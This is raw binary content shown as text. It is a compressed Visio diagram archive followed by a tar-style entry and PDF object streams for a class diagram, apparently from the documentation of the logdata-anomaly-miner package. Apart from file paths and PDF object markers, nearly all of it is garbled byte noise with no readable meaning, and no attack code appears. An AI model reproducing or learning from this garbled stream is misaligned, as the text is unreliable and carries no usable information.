y}aR_34eιuDbRrKJX˭7Sy@dvz3zRsla]/N[Wj^sgB$QЦ`ry,RRiY`s+etpOwŦxmaL'_m;+ZlFS,8hE2lPCE0P<]`Z-d(Xڽv\BpY R%քvNcW-a녱 (!W}*Hjڭjϝ"u]UNx3zqqrNwNz/nlmb|.*vŭSY#ځ\-b,إ MΞ j`ϩ{D-ɣ`;`_*- 'x7FAv-`=*N!"33 ctn\wWuZ:]!kUEΰfUHk^* uop@8x쾡J0BGA !ܤ_ lMzCWvן)zc6ӫޯLa6 M.벧aS]b23B\ҪUɲ~hE2ǷgQyLY}q9^`XQI9>!eYA[U7e_f(6nI-ń1)¬0_Z(uRz!Aݸ_fy%HXimD|rw*J^rܤ}0ۈn*R=B{Q 19 -%c@l/Ǧ9`ف)b=b؟aXn0yDr' &^$r(]o0 v]waԐAuyG8m>45p"AZpHAv@|!UNV251Lhqg G jw}Aʯ;ػҏᶰm fH_pFT| !hVG ڐP 7mf8]$}ORi=,+H1q69C`Jb ߥ%"i$Q--b,@|,KrA}pS@kDbc,3 '2Mg ?ڣ`Úɾ$.s|-Pw @ |W d (6Ev"btqzu9dr7#hWU{XUa=?jJG4QWر (exxGu:X%%]Q`ˀN:Ac]mqmRǬ=vev,|씂O 9#~QeF;s0)S: Ύ k)rfĬ3ru6#ؑ u'6#!4 M鈩3N桻. t8\ gg t<0a`q.wo<p)X' >(=yE8gGTZRJ얅a-*[(غr=Ǿϖ%L+p 1vKaҥu*_;Z{еWUKSq!2,u"mنrh "s`|BŎ s IbG{s`ս@B xE&{2 Kw@s9OTnPK!z visio/pages/_rels/page1.xml.relsˊ @AξR@CĜ&x#es %DSxc&ZV 0عk|AP13c vv>DK$HPJ:(Ev@oHƄw1{Sx{USU{64ŹӐXHZ^?u5*F {,|.s%kYf-ox/nPK!L.kvisio/windows.xmllTێ0}CmM+5jVBIl1t1g.3s&ݩ "lȢkƷ)͇Yw7kqTִb'ֻy:3e۝eJNf8њ(fJl] +s`sj9w"_er&ZBn%fqCGҊhvQmjHISHp\ѵdEb*sQ%N9 ֚Co%z ktQb%<ؽOH "HtR,JR[Pޝ}](.o Z%V`>(u2ٛ?OTGl.žɰ5p63 0e|9/PK!{ =visio/theme/theme1.xml[n:_`AнuM N%c˶Ndɐy8opf=vHJ2iu۸EQ8 gFCoVuV#Y{RZLiVGMT7,ґoYTE}FiVGGnEJ x6+%jY͏te,h dP-W9<Q5{!' xǶȳ~V-Cfe~*{8,*؜ &WҺFtG5|#0H54"OqUQ؋3V_|h5gQkΗ٤*rּˣr6&C \ӏ*5D7.ˑl"۳檪 {G+ ?3b׋}<fJ$0%~cӧNe*E#cu74"=rmO 8QLGNW<PKZNP|,iAOR&apZD>p pLu ?685\h! M?;ĺL(`fKPˣAP8'wRPYG;@ Z7h)"y_?GBu⺩`4/xֵog~qUMv/y}">\J]س,s$]~_ e1=bߝŜ{۳Ufź$~1p휓^fųcQcYO<{l6+{]Z=6!CT#TׅjF[NmI仺Gg-wWY1O[ ==SG'kJj__-RmMqi0Q"- 5։Hc)ch_C`u҇l'h5b Wt$ŜhWgiUM!Ѫ1/L|`vWh=; w:xCF)xrݤx1 M1y;ͪ ;^%JPmISRU6ȚxVPQSLR#Dεn!vEo!l8 nc!kj_8wDH/ QsQN[;9"1|ˈ4bD ZZ^bfT8] آT`̞am3'>6 u$&{$Dll&{3jl;Hu+ǔ^>h?v8g*qh[dCA %3?;UIUW o3B6hҰW㛴FsϠ$ż[L$(muCc|JQ SAV'~%IU-at 'Z" ͳsUyG;۾@y h>"V<ο̐o7$9M cHʕH awPU\˶w}ۉۜ zCLЖ] [~'DI8>~ *Y9dwML] ; ^Ez$C?t!Ba"\3BV/D!aK OT%j p~?IƳ%0ٖS6If4 ^35%Dw/]Omp\~@BPocddd2qW^i+\\\h4j333uÀQ4 <~F= Hk9<3yz-Q2:;]6YMuEr.'4Ϟ=Ȯl=s^aC xf4n~^ƨQCo3:y6d0қ-z/ua=kx&)aaTOe12Tda 溺Y޼̐B򢱨yжѳtKijaSl>"p(3g['\B{uGǞ_grǻa3v =Y3y.D,0z H v!nEͬ~cΞU>ܮRlmTԷt&Y\S6uHmf6T)`4Lp!ښ"8V+a$>kDJ+JA)M/T` uKGd;TmlJZF>1QT" eǑuބF FK# C Sz4WjG 4wjȦ!ul# &]َ>W!N%NBmIe:?b6K_=11LOf7 RԘvfc>Jg*]$#Yq1 `i'|X:en6FJ.-{hiJ3J ĩ'FMa\7d 8Ҭ̛ɰKY'm?{4?d2.`(Biߵ/F Nhjx iػFДN}BT7mWiko<s4pKH 7aL=0>cvPS`>M/&k4Fb롃vGflyܝؠ;ӉH8̖#SU%DF]ysR~#8Q>f+iD UI3+8u|"_l@x| Xw虦nK^twL>'(pq!%x4ֱ/Y֥&j Fٔ&YM7`ʞXҙnhBӎm:yH@֎g$kl("a_.I/VI9Ǘ|~*50*i]Yhm]rjp^Fq'&_2Gӵ7*\̅|#֐5 N籜 3 ST0ʯ#$*^HpaJV geV+i&8![:bL> MDžE^V_EȔMB}+遖Erxڥ8c_uď[D[K/AE|(C n@5?TmC(r.Kg()@tJmHb<='y*Ka?$ePn [Vxp_hn#x$xU7E'B|3O#fgd&""T6qtg{|lÉԚz҉yGFp/5Z(ģR^u.j:d2:NKbQciXޮ)%vMb¡%i@u$F,Xq /{rQVj@K 0}#qw ̍Yψn> $'vo쪯bT}hvOȲ _Jm΄;!btg*iٮfҎ'g+bV l*a(|`&t!Vū "Fh ajmI`ĺ8Нvu+Bf\;$"e+/ ]}2@W*+,(.9οws _uICkH, C_GCPJTE0 evCƄ-ty C1XI3~ޅ..R7y Mv }l9ؠO̗I-g\YryHJ 9}F)BtJ}Fc㝉66 h g )<עngdtnۅ71] b{1Z.,Hh^|"+R5Es6?F.&$!ߡ{&CmUs4NuްtgRp@CɊ Yw‹wW&&L/b[`> d':Q:cWĤtmn6E9AYRQ+eTbb|AD cYl6إ=$BlҹTc3M)6 Nv,Y6JE;DηŠVR!PKuG6aJ*c֔n_UhM*åp^u,Fȉm|_k_{JP;FٽBU}\OJ~+c)m}=" <(7O|ħolvwz2`we.4#mXk}c_nx5qFGC?PK!`˵docProps/core.xml (n0 $R!qk{jKb7Mb]$H̜v`D'7W-~CLֻ 75-WHQwaHi>C"ZH\:l+b' J3R8J)06<(;@e*~a"w2bFshZإ̉x4{l'; /S)r͎6P^d;<PK!5GdocProps/app.xml (Tߋ@~/X>hL{'9R`R&Q}g3j+6/_2ͷev`jݞ@%:*zs1B wǧFW`Pe[#V߷JaVɴ)kr_gL`m O^߇=J!T- vN\v*j81U!`I܈=ʂ\Ndb׺e n;I԰D+jAsGxc]ooyQ,!QuxTULO $%fS?pk ilw8A0+bn<Co' ipW8]TM89XSkܖ7aPk",:k~{9{,VM+TϩjhV$4mܪGhS eUՂAR`VmVF**IZ+VSl핚 v~c"-m5e%!cmI$,J"0҅kz"ΫXze@J'?Ivy鷮H&A"N]nc?J/PK!p{>sndocProps/custom.xml (_k0%I-mEma:"M5$%Id/* yȽ79! G6XHYPm#!0Yל.\ ``2;d4==fzRqAsKxU'h)fʲ![E+fsg`*YNC"e>o$L;&hb?0B{bOg8Fs-O=vnN:\>b%HqἎh xn!3BuҊX^lC!'pE'#fS< PK-!{Œ[Content_Types].xmlPK-!Xµ%^ _rels/.relsPK-!K!visio/document.xmlPK-!:Y ,3visio/masters/masters.xmlPK-!?R&visio/pages/pages.xmlPK-!M)visio/_rels/document.xml.relsPK-!#$+visio/masters/_rels/masters.xml.relsPK-!Ù  ,visio/pages/_rels/pages.xml.relsPK-!A* -visio/masters/master1.xmlPK-! ޹o 0visio/masters/master2.xmlPK-!t 4visio/masters/master3.xmlPK-!2uѕ 8visio/masters/master4.xmlPK-!:Ty1<visio/masters/master5.xmlPK-!dSu'M@visio/pages/page1.xmlPK-!z qhvisio/pages/_rels/page1.xml.relsPK-!L.kivisio/windows.xmlPK-!{ ='lvisio/theme/theme1.xmlPK-!A؋F NwdocProps/thumbnail.emfPK-!`˵docProps/core.xmlPK-!5G؆docProps/app.xmlPK-!p{>snUdocProps/custom.xmlPKclass_diagram.pdf000066400000000000000000003611101437606560100340330ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/diagrams%PDF-1.7 % 1 0 obj <>/Metadata 1248 0 R/ViewerPreferences 1249 0 R>> endobj 2 0 obj <> endobj 3 0 obj <>/Font<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 2282.25 1968] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> endobj 4 0 obj <> stream x}kqwU?dz)s2UTYH)*·$ŊCK)Y`f0=CPLUd.tݍï_g_gGWJqNkә?9|?8d021~ᐽZo?J׹5sJwqug,7Hɧא5NzeK~|ZҤjTKSs+XiW㤵NYuJڵ7Ϳ9s%( N7/ƯW9>QWw^W}MOηrV.|]pWX9xc-Nngl7~ûptG:>᳟g%Yn9=J|)s))ׇpx_9*,qZ? ~-/w"2cDdշ@1A$Z3iO+ | 4-Ws*T{=sثþe Az46_J2F<!Efev@WG3/~7Dm'D' wW?"EZ>qm9(+[S}OKW&j-8wZ=Gvډ: ;+-j*;<+d*_ԇnLܝWFD'&CyV.y,HS)?\saӎNZ*AkF#53! % %2kOz5zx0S=y?H|.C6SI!IrdV۫Qz|+ꭰ !uޮJ0r$8̃ XdbSwo:o␢Ɯ^řŖGګ8q3uQ qvK[r53p?Zsf#k2y3g~j#+ uK9t|WQyh|ZqBzx&[fuVuwlv^w_G Q&۰F)w^w3DF9Yz,ߍ s"X X]zpK',eQp3{ϪV|fV9RvFqu*M$ HCx>,]T-H_MkL fޞ(6*//yʃ^p,ϧZ"D`3ӻSw7Gibm2L4jre6觤N_86|C؜}Fr,h xa($S56Ò^i]o5uW[jQxY< _99YrzciXߍ-Ty)#=uyue^4`FИt'UgPtgrhfG6Z͋LDs [r KK \61NCRbR8<y$@F-s" # e)XD^ȨU֋OS:n 4|c=ZR,N8|#u mz՞u F`pRs*o!@^}"^ߵNiy.B:X[@.ޣe| NVDop^i}5y#Ňqt4sҬ{ j=ă`PBWA[^i[0aA A܇n>|3cotDոE'lU58+EW5'w5NE>&>kzSqfѠ|fC[l㫁[{p.*Sӭ֩HfIܗO6ю7ϴ<};Z*Jv˕ Ǧ/[ǟG‘WmK.iKu;OtWNɧmx_0ӶPF[W[ .8:ذvuljZě?5,z#_PaXJBˇ}M_"ix+Ir+; vwylC*);$IV㌌ƫ6֗/8]Z3X[{$h#=W&U(r7܄L=9bNvƛ}Sp"CL9^Ne›'r5ͼQ 8񎁗p-- IӴWZT̿4lNhZvK4RcؙpP5 ֩8m;UB.e3NTL( Uc?H"r)_硈׿E+t[N;PTA2(%wq~,)~HX>BK!8bú%\PzM*}L74"ҧ8:T0X.)&Ni%9Pt?c@-~J߄ *'TZLrm\9: ]sH}qH%=4?RnMB,|G=DBjX?BT 2Sΐ05X FzU'38f\l|5zLvZdMÆ+-yo١|intooz3ˆɫ{a^5^ޔz텖[XU+9E[z6!O#χJ⬛wX(ҧ8i3;HuʅsD.^yKwk<dm9\}C_m9E̊~)FfݰxIj褅˟Y/y ohE8]SxS[;H4EsP~ k3 ka`p,@x7,Ϥ9o*Foa3U3Q}B@ߠJn`Z cu*q%Z#XBS<d y3! LR)7bb#4ۭ?QmjàcZ:cWy`wl|э| ,ч-5l;&`2֫HwAǜ!J,vV.e#Oyw]6RX ۚ7jHʍ.I}b^-FV"wYr~~Y{f杀jE.jk]=GyА9.wSkF]B,Ք [wa(l8v'q:6< N{64uvHzRAupFp)ox71lՁN ? 39uvcރl7J8Sj]+)a.U@52FcXtXz_,3 rۏ Pps1O|5J1tI!v U4'Y\[ M|Ϝ4g MR蹻7 c(Ά 7q'^Jk?zfx{X2Q$/ohfĥ@xӷ'z\UjjQx9b-<~^˜? ȴFp1`I7ǡ9qtCM*=^Wnܻݽ$ۨJNyShF~\׸Υ؍=U 6P撜L\JļEYKh0;x}qv(KcF$K5VK=hS5 sd5wuw .=fN03C=6~b:K)oF)!1SѦ ntaz@#bumwoFJ6՗]tEM.+lTņR2;J>7l*e=Bg1W%R羬o څG׾ʒӕk | {{p9yÜ5ZUԖw/7$dn˪y=!"6x:tL R5K"d%rʛ,jyZ1aZNg*hc;OV9{e+AA{]?"WYqiyZMI4֘2lF[Iӿҧ^jk}DZ>Xq=lOsLԋm&rGϲU?C;M#uw1 y9x; :yp:ܷΕi^ NQHk=‚~Mڅu(hkdhՙ7쑩(ԥw"QHʆ";\Fxmcm߷r /n./R*2@}WQw 8۴u֫<6Ѕ7T[Ra*,ۃ0( ] eOFl;a7MR#7 _ZA B4zT7}dB8x7u !Y_d]Z|^Fj_FZ-( A0AA2BѤS)oO> ,_,4yI jp@Nz9>~:0[ 2^WYZ,܏OΞEr^`abX 0׺(Ji:VQkS4@w1[~S s9S* g$h$!xm{-- ӣ XF CSGO>N 3@Ps- x߁t "pDM~%AEZR mN ݋_t=J/xF")2Em ZUk+(iP+x%ګ<|:;,~Ĭv+ҰG҄ T41Vك=`o'Bh)s#HaOd \w:p,YfvX0ðYXBUjϤq@)64N[$zAK&N!"TuґLUBˢkF3agMmunKȅPFwbjg@^.x]ZTA-]dz\#Μjpc{;;-pc_ g!Ǩ-}{T s^+qф[v+498 Xz8|:pVWYbviYyD{@&#j  %1Ns^lht6!+%[,DuI(59ufKlhl.oX&Gf1gyQ9joiS8Q E #L2.3)j۹(àƥR/X Sq!СsyJlmJo: ,B/׺0oA ᜌ|#ޅұJR"Σ:=zYvȟʐ&${|Z*Bӫx*e_JʍW2[(vmgw/a9{s pQ1G+K2H`?(H~bӆe -fLw0{ f5Y:o~jfdS9v*UؙI)x}fr-1%Rsy':}o7ΰ8tDh n$#-qs.bxJBKg,~ 4x7bu2 *7\]e֩|Tmm c5$ĚQUZ5S5FNZ6U 0xk$ҊQU&a39ç,pٍ*ae' v)Ԍg*+jer&ep#M_12;חzj% ԕMEix x-(Ơ\ٻ[6vZ_B}lNEP)6U*6"VMdCdbDH7!5uo]6$uPQ=΋BVkkDIy1vɭTf?:^\x%:0eox]T<$0iyvTIAv`@{ |XT=,yM>Ra' mT X vEX?FԐJ?aMQoy *#k2'N4W =fs-^ Q !Yz7bɱͼKQ,T ‚î ͮeIk mzA+'&|lPm,h|)cKh_@]s)6*o'>xHLO  JfMM|z?j-Il~8Sԙ ?~ JFp RugKԈMI&D !-@BwNK0fG͛NYS)jGFֲ)  R:-#I4%𚇛z/T%Eo>~TNWym/ @^!kk;c,U͋Z?}0ƌ!ekO٥4 lEu+N n 8 w+. 70GetW~G}->bi*"s+_ Ɖߟ9m˕dKc4dH(#2A#d/! z F[f#ge>.Pa@ =' a;cyUpmЅ唄sbӆQ uI:M^.LתM$= 1YYu&NM iSΰvX立OZOB/u=RoTQyggy4ؼGT>k[XI'.bW;Tօ'A֘ cܠOԻ-RrX!/4|>=3`|3|:/ /}$& nֳ<4㘢cΕZj˜FtflP4G'Lu*LWXQaJg)Q{a]@Zz7ߑra"M@|ñ<ߗGp^Q}CR%"9>뗘ANql %G}+;CK؍ w^WݤDhEyTe3ˡ./?1NNEs$Ὤ޵6sp/W E'+IDߛn 03 y5bdK?I,V.6HRO_zx@MѦzwB-Yɐd~lm[)\pfF|RUg;u"f{J[mw|7J+E+}O/iu:߳^ 1;EX·YGBk=σn|[;z,UFt0?Hc:9HGIs큒 @4^qOWqj3rxdJBNy3m}{~wT_'حt|"?жÑpOC1Cv=nL֮>h-.T@.~g#چ{8nf1pԱ0 HJ*M| )Uu,sRzעLŋbNRRs2lǞ(G 8蹞6^h-$)DQ{E#eVV.Nw'len헛D˵oJ.lZT"`/9@ Arjb =F U3JTz<'UÌY=4Vm0x[۩4{Xjfl4AށhS8Z9)U@)>aA{L(/5Ӹt AAX€FafP F.όR(A.k pޚI\bil!&!un G";[SF:vI1KΔ8TXi=k 3Xt`QxÙDy||2>X5ެ9RĴb̿VU%ZgKHHK.cȁ-{.6yDUg*gAACI#.7' [n_JcB Y3*ܮJH=09-<$1;CNXv"?!|Rm1:d0k=Yߌ(G.vJ;gyV#J$U,}cЛ KSw-s{ĺY:o LNqL>-; 7v>ok]^rs]8RoӋ+m6a~PtGMyޣMNyV <?S h|<᩻,~zb8MK^*~a"Nf/tIe'׮/0h4j07D|.\X* OG />|w"Ҷ59F! QzRQ49(;D';N4Ó' &K-=Q%TT6rtFA,-d RjO{z 1 RpIے=oT<9<c#(}?ڻJ2Eȃ 3~FkDsd`yG|Pҧ%h F+4O hj&!?C͞ɨ _@vy) =^z GK3Ȑ,E&eA)>ٛ#F E ,d K<)KDӸv5b$QjRwØ~tثv-ψrzwQ6I>' %^S[yE[$9;'b` &&h|zSOiz60x9òi&+P,e #;:|`sٱ*K,aUhCڣA#̱v-O9m%*O=c V0^$| X]FW{gn}l:wNBDqeb >J0<["!Cg@CXKΒKH3}"v܀pG='.:ci=v6{5!n(,YmXNvEZ촤ělu [R OuF::y/Z!MyK!FYȃYvf/[#z(5YݓLI?'&# 7͑P9M;4LX$gf$>}d9T|dcǑbC E!J Z6X)??̇ih- dO8;cA~;)pEgZNٚ|XYPƧH2?GX2Lb̦i:2xʊqTXY`1^1D=?\5 8ʆ!9>O)pEgFSN.Q_H:0XZwmW)^``y:Hy22=dwO#93?\U$EmQM_/I$X$uY!0[RD]reOnW/uVZ4֐U{'0ihcU7%dKu2_5D273PA8䏲Ox0kOuHNTy<:? +8X_gͭ<:.ӜT'm cPa@ߵucFNJt̯XQW OD\Sb֕_N0Y- Z|A +F9-ORO ҁ-206&XuU\P笤 kЎb8YIZf^Ēs^ x<pSЈR=8,!ԫ7RUi\Rߡw>U{^ӈo]@C}(àp9Q3eZ٣(UewxiR=r^X# 9z7qˍ;񅴈/3;7BaÙ)I #GwldOݴ:y(KZ➜gz.zqjUӪB5֎^/7c$2_)$Uf;?p|8| ;yi&CO'1o@w<7y% #9JV teC=J^FĬ\4VwU [2vjb nK2ؖuN^|ό/*ƈc@kڒ vk7e;0dv ;Y]֯#҈ᒥ/=w͙xe& kK}muʆ~Y5f;[3OhcL*tޢ1w&CV2z?,نnŏIcF}!"q,jy( oe#6 +a̵ouÐWهMB G4s\GQQs6o̼"^7YMg>mq:|+UvWT@k\Qm quo ', :5F;>VBh 7%Դk`SgH36:\)eL5}W)?U( ׳u><3i<5TH *PĆ}Ad|@[JO-aR=Gc30`1LC/).Z`=(YWE4\訢Wta`WᏆte;q%`{{ Eʣޡ~Tp=k"UJ.3q\lbĵokNyJ*pDϸjͰ@6YtFYnhYnkZSE G8~knnBMJBPJC1\U/%6۬7pU ?å97[d*fIP˺a0~3V H@>⎩7{-&2wg4PAUf }qCq73|DWRDx'(d/gU/ƒ9_gy2}bFO`ymhE_ƆҧoEW0ڱʖ,^lϧlhI /Jn L,ZL`S< >"SqG"oU'hz<'hȾ[)kp%F`X3Bd)]P\HB3d$sP),4ԁN@DGR?و ٰ߮.G:d f8-^fY(5ƼJM}{\"pM=! fU@/4[m6U,{7CN@ٝ*L+jadDVt"Wg."΋ugZn_'[6Pr(L 3/iת.BC"-.PVn>tG/.,GC-v;' aky((N%xwT&\ָC3(d!/'jlz$M-,qz27xQ'Qgm؇.Z 3.̂Ec[XD@ejpfE䜭ꡝQƫҾEΚbՆÔܤYO9X~GU셵@g >Z@.V/i؂ 8,wu̅CipC8;UY .N4xX,Oq1Rl*(ѹJm1 `Ht]FEKH@}mf#Q W. # * ]gACK82P=<}/e)xs Jjv7|%p;̶# u}70;3p !̣W:f&m!eY<_E6ٰ3>3)7L9Nz}O_]N!Zhf,ȍ#„9 Pi#G egGFUU"O*z/RtJ 0,E[L#mQ(هt?9d~{A*p< %_DM+ZB@;Q8AT<$J$m!G ~'|:Яp C @X5wׅanݲ:{ >:3]C@7LZ t4@Y#F0B242"46dBu.x{HZ E_gONiNxS {q7RAa/ ~;>BX>t>QrBL/;#ɓn7Bg5Jv72  B^ne&7޳L~Nh\ w9a8< ʶ̠YF4s@(oy U*5],KM.^2(jlG|eiG[<a2#MfmP`z<,fqe9dP*O%ai&(q#SPHA߱Iwh"C:ڡ M}Q}/1ñc\ 囨){ H„Odv̟U[x[qa[ 78Ad| Iz|Õ U4HU;|%4bogn8( G7f91eF yšٳ0d(9l MMKϼđ/}=qԴb UY8 P.l9q=5'lʁtkI?>{fE/O,]-i5LwLu~Uz?׏N#Z/in9Q v#J=J%4߰Yӵ,#힉2G20c"hH ;M): i00`s^4oWJLOhY2LDڝ٪!{i㤥Ԕ<%5<6#u).:Vh<a=ju_V\}aP+(Y6(>QYw$m *?{Q)2gGohKڭ,va,d=7 qn8D?*#@JLd[%(0*g]V|;%[N9,ڜݻ7_Nct'jiFRJ\ݓ}񳪬 nc]Gש5y %&AkneQ( )LѦiu%6헡L}NYĖ=GȞKAKG?(2?`~n|QaDapw"ɘ =}1%] DOmXbUWBWytuD %S.֠RMyVM[V:9cyb 7^:bu?7*YuaWg1 (!^t~QemkO{U'Wv/Uڅfp6~q@Eh]n8yafEkK %8j8I;~KR?:lC^u/[k[}0 B\q\d 0R,gY(* +?3g$ Ym ڞ!Kif endstream endobj 5 0 obj <> endobj 6 0 obj <> endobj 7 0 obj <> endobj 8 0 obj <> endobj 9 0 obj <> endobj 10 0 obj <> endobj 11 0 obj <> endobj 12 0 obj <> endobj 20 0 obj <> stream x]ߏFr~{?݀aĸ8C285DҜS_PR5UO]rDvuuu}U?c*c*c+]2ZWW&lۺr!U&T%VNUUleuJUBTIӏJ1VWZ+WY 6TJH׺ҾSTw+*RtUW:XJW&vw+S3jS;=Ԑ}%*T>=bM=b\WybQO[z{j&XOLՆXׁ@MvD'R;kj9_ɮFp%tߩjCEMQ"Ҏ^ O`i8zOwHH\FHM$CMMTX5/ԛ䫨IU梣&R&IG/h߉n"&hu]&ԚA]H+*WӕkDue)p$hzNԝz!(_IcH"Ab]CRd4)Bq'IH:$BM6M@}O!Ӑ M*exDA4h 69/qڐ@}*Cru~"<Q*%J8 ARQ ɑ^ DI䩷5T:iBxDt RҠ8 xrbvH4Аie;7(QC搏*@Bko#:jMI)I?OJdθ]B ȿ6̒ju:"AACDFI u@SDf }cUtB Ó:w! )%P .݁oN)ѹi&T1Ouo "Bu\XFͶF(E6j"RϢ!MAn"Z]p 8PX(@/ZH-}~qw֐Zz9Hjj]À2z$z<$nTP=;Y Ѐ4BT#*HFC+TՊdbwҊ?~7߭{g@5\[m88[,: @Y&{ *@*oC4IS- tglqiGdz)LA,(OZQ- GY@r4_zetć")pp0puQu=43&t@>kS'ǡ,4%P;Bz>gݲxm@ B7Rer !ݡEY<ځzr,44\O'-3 w5Aj!DhMFDfR*/yIpb" :\MIA:dM;h 녖kq 1GbY ~~(t1I"<;l#!tmUo@I-'dޠʒ#A|-Xo5tA`#,PEw;Fw9 P;Xۀ.%":%k>4T.jSP!H НZ *%jXLZt έHZt iXh|(39ɐl]EhuY"Je5Ө#@za!:[&*У a=6Zt @^F(5z P OcLd^;!&@|OȖ NΓANw: 'I Q4wuF6 '%L_* * `,/ :o!/py j V. fW 9(6빂$Q¯<oxZu!<#Ix a t#z4<˨J].@ڬ݈npQxrK }"F|4A c !ܑF$rE,T.lHӍ{zыus<*xSWhi xA` Te+_Cw-i]t9ȋ*$ ='#CB>PO /c@x < 9p89S ́g1߫qqG8qWQ'g1Ę>]!v8T(f`Sk2Str3%< 70X(1^ r; 2D\Hw)pIA=CsH6[.TaRBQG̓6ea`]#F EkgQW"'OSDDٞD2DDfsYԑLI@$_NO;OM nFn6  uˈ= S"&: _a)Ea>֠qyȟx†&J!XCBxs?Qyh]B$I( #&'=&m4/|ƕ~|M6٧fq9UzyeUPYLEKtuVyuty~^oH$kUO!ܾY#ɉ4#wTSڋEZχOMqTBK)/k6z髯XZl$RXaap{+H< z1=ӦY~kQɓM)km4-d~|Zv>6Zhsxl& ,dfY̛?tUrdKLp=bGLf^`.qmGْ@W޲Ԑ bC/JI>S㊍ {߷ D]rBkB]lBT 9!XD^ kÆ)bn WQC6𺽴ѤHd| hZe.8"al{-64~kL;=Ns\u?[#*C뢧t5_66dάYyWF#r +zZ~@},ƗicY5\GU/1NcEs`XpN:zȯَfXE0n] Z 'Vhqquŝx_7S O #n ,7QںԎR;I8̠s1u$ ,3E=؆.ƣ[U%,SHò:_Pߟ"bcw7Vűߦv5 +8a·7r>|,VOϻ/H.>v]J1yqV5 louw 5vQ`46PKC(Fwx~VcO|Idzp|QZ6zyquuV.tk6~Ԭޑ~9=IB(Œl:vGͳsD8MyoA}̛lxڭ7=ŪV&2^bj[N>>7=x.8hy]3yZoŚq٬v,̇2R긯}au~V r0s:z^ bpׄt7<^(z'F)жslvcx8x8pnȧ @RK ]R ʲDnDb9yYWl^ {<Įvn]7q`4 88REOGp;KWn{5[0-R$|d8e$|-=0I XOmVbpɂu[HJ QM\~rx9%H7+C]QtcnG}GKZFT莽+90~.y֠VS%q֕$Ymo'Cm5]eaVb xjntzS&3EZ+Xat!sb' NZ`iWW \<8+bssݲu0o2 CT+$iPiH֦Ry7 NR%i)^'JTضcun tirǦfT?y\|f5'jo`@iE񱇈-{a`˓ފw2: H5aYqN9t12n+}1ybGrx~^.siS ii"RGО7$ʒ<#[tIFiQWXx4{<\_oƶi>v:ۭ7;%s .PF\P`dYvʏ-8+!ېOknSƇd+>栯-&IKIM>n\FeƎZv :_oz?['J'fV3s 95c1 NKs\$0C 8 gT3kqa߈N8G<.*Qa.zKV'Av͸@mG4#\ E<Gl 'L!kyٛBtY?lG8f'Y(tdO,<۳V<*aՈ80+JpXgcխI9Q؅J]L3=5-\⊂C"՞gqSr]C尩!my #@fT&Ŭ;QKy9f Ҙ=cϷ8\)Qa.njA3>wMkq`Rr]Fxđ1WM[~ɑ׺POK=',nB%7e#_7iUvkG>jf8Lѓ8d+'qx{iKt˳𹃶!`_&iO(`#l`ۂgqk>A$ {~>?Ib>/5;]VgV_!9_e\]Ve!|(ܖ]$ +)m/Zr2SfÊEP nʫ^l euei)Ck3{&cUy0cyLJƘ<_&{<2乿CIZÊwqlbݻۃNgfIgѫQ;kO)ܖq$ޥA!IFC?IKϻC^nj |xϗe`FÌU((a{s?tSáB!/=W/B#wZ}/yn&Z!H4ķ҅fϏ7OI Wp$xcc8WpFJŠm/6%*,k}¶Skg[,F}SHk k[ 8R9A-*a[ZZIKQ!j\ۻvvSS}mwU/za'e}~j=S$|yw!O=-ͩG*b&inhp7yN~I ,平$;/O]AwyjcO;D徼#>^f x_.@o֭!eIc81Wp2Vg$̛}\&&CUnpJuW]G:‡72[8'J W7:ui)ZG~#nG A>>/ ){ n_G<Sq\o['ZtdN| >f&iO@] X>h 'ݝWY ҬRN)k]^;l['^9gUg/{Sqe7TB@l NO{ryyybH̖t*1mBV bq1t|>}\1ӁnPy%:{`;a;aowQf#RGkے]]鶢<R2u'4p}$Ƹ(ԩ.jyytMŶ$]6Ͻ/>|nļwgɰjW@cӑO.Pden<9+tW7vnkqyqW' {Io敼|>)i)'^w p߁h3a&۬럟^J\sע"Z| 0o.99{,Ŋc̲=1n# V endstream endobj 522 0 obj <> stream x]m7~NFlvlAPfzƺHIny(šZ<<jǁszB'C1-<b^5FOx&5*41.ї 1#`#U eۢJ i5x8ܶjTXKkk &`9. ʲ"LeXps -gbb+M oJaDZ%j`ҍoy M #:?cA}r0&[DBkR!<' aZ c>p|@8V fa(F1gH1Ady |KL0qMe (ÔB:6 м"!Hz0d9dGLJMj&)*H# ̷BLhl_|aC)BI`LB˔ -^&q~kM`ED0z m6(M`kPp[  )XؕR B٘_)cqsTsCxToG#$>Kp<=7(EA.,g HfZrÓP*<+'h&'h,ۄijx w9@v? ز-8flA$BaBE]"`f0!AM*ZgH/ (e9(OhMosi!E>]`!U GmD(h"b0]Ad;0QRز-s2daD҆؊3(7>nmi L }X͸ t={>>,3Z搠C7>Gؠ-刚A3}g1V0Hy]9,aodCc +{@!g/AwFPρRpwa9PI`ѲENA}CS6d,"0ˑ5- g<s|;0LZ;ǜW#'ؖsz95(4,j+\}.- &̶AN ]1|4+&"PI5bRo4%J1 Xʱ|e4 E#708γ-En>scX?'H KP}2L`v a>@!;JR/\d 22R59 vn,Bc(H2_ɲʑsXnnHqfx CH8rh |.d4ݠ`̶c"ñfCK64(+e5huge(kҤ8Ѝ~-F.,= kfgX_{FĺM|lW@ ,  " s #)#f@W8}B3)= Bo-2͊ p p̽eݑ̊sNGD9 Xk$">1Nyb| $ۗ$PO,Ay"׈xCɞ87 }ϔ>d dioAjftspaLi CnAZ$#bZ8$|@2$ - 9 UR`Y~Dopgyym~xūŏov_݋voϾ4_>t.n_>6lMvx_頥˷v^ ?C 8C-zUS(n,q)D)XZ/ŲvY-3T_ mfq{Bx{* XUͤZg:v~$A$u}Z{'k޺-yHPm&Im~?~,~lFpؼf3i4A)/29簇v'uV0¤*pB3!]K* >(5FHOllF&s~|f\ H[=F\T)⸋3G,~ mx6n*?m|j-l'}ll؉b i<>Ca)UGч|g3X:+?xj, KY>tS8׬OdxP?[_wa$uU ウFlGݺ͇D֧O+C$m%gLǪ3mM4Y{A~JM՟Ð8i٘me/s7z5AwIiā ѝxP6RAbXntHϳHH5M&]P b=VS)xR1T5}Zlvzk=^ߑWh?>26x4<lv_f9BxyʬE5D/ <ֳjp=ZRPVnxZ.f?@:q:ƥ*+IHfS:ߨ#?ơ*(~`}% ^xNӗFc?{Q?߻3ZšdUqA=¤r0A,cy $$A@/Q'O%Zki3T&v$A% +x Q?"Z*H 